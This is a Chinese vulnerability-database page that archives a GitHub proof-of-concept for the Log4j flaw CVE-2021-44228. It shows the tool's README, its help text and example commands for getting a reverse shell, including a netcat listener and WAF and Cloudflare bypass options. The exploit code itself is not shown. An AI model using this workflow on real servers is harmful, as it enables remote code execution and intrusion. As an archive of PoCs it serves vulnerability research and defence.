漏洞平台

POC详情： 173c13aa6ed41699ca6a1c505b29c87804fcd907

来源

https://github.com/cybersecurityworks553/log4j-shell-csw

关联漏洞

标题： Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述：Apache Log4j是美国阿帕奇（Apache）基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞，攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器，当该请求被打印成日志时就会触发远程代码执行。

描述

A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability.

介绍

# Log4j Simple Exploit
A Proof-Of-Concept Exploit for ***CVE-2021-44228*** vulnerability.

Log4j, which is used to log security and performance information, impacts upwards of 3 billion devices that use Java across a variety of consumer and enterprise services, websites and applications, as well as medical devices and supporting systems.<br>
***Note: This is not a "point and click" exploit. The initial trigger payload will be generated, but injecting it into the appropriate place (i.e. HTTP header/chat/etc.) will be up to the user.***

## Prerequisite's
- python3
- pip install -r requirements.txt
- Install [jdk1.8.0_20](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html) and add bin folder to enviroment variable

```
usage: python CVE-2021-44228-exploit.py --help 
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html

usage: CVE-2021-44228-exploit.py [-h] [--userip userip] [--webport webport] [--lport lport] [-b bypass]

log4shell Reverse shell exploit

optional arguments:
  -h, --help            show this help message and exit
  --userip userip       Enter IP for LDAPRefServer & Shell
  --webport webport     listener port for HTTP port
  --lport lport         Netcat Port
  -b bypass, --bypass bypass
                        Type of bypass payload. None/WAF/Methods/Cloudflare. Methods - "ldap", "jndi", or the
                        ${lower:x} method restriction bypass
```

##### Example:
1) Run the script for Linux OS with bypass payload of method
```
python poc-csw.py --userip private-ip --webport 8888 --lport 9001 -b methods
```
![](images/img1.png)
2) run netcat on port 9001 in your local machine 
```
nc -lvnp 9001
```
3) Copy the 'Try me' payload to bypass methods restriction and use it input variable to get shell in netcat<br>
***Note:*** If No bypass is chosen use 'Send me' payload
![](images/img2.png)
![](images/img3.png)


# Reference
- https://akashpatil.me/log4j-guide-book.html
- https://github.com/kozmer/log4j-shell-poc

文件快照


 [4.0K]  /data/pocs/173c13aa6ed41699ca6a1c505b29c87804fcd907
├── [6.1K]  CVE-2021-44228-exploit.py
├── [4.0K]  images
│   ├── [ 21K]  img1.png
│   ├── [8.4K]  img2.png
│   └── [ 29K]  img3.png
├── [2.1K]  README.md
├── [   8]  requirements.txt
└── [4.0K]  target
    └── [ 41M]  marshalsec-0.0.3-SNAPSHOT-all.jar

2 directories, 7 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。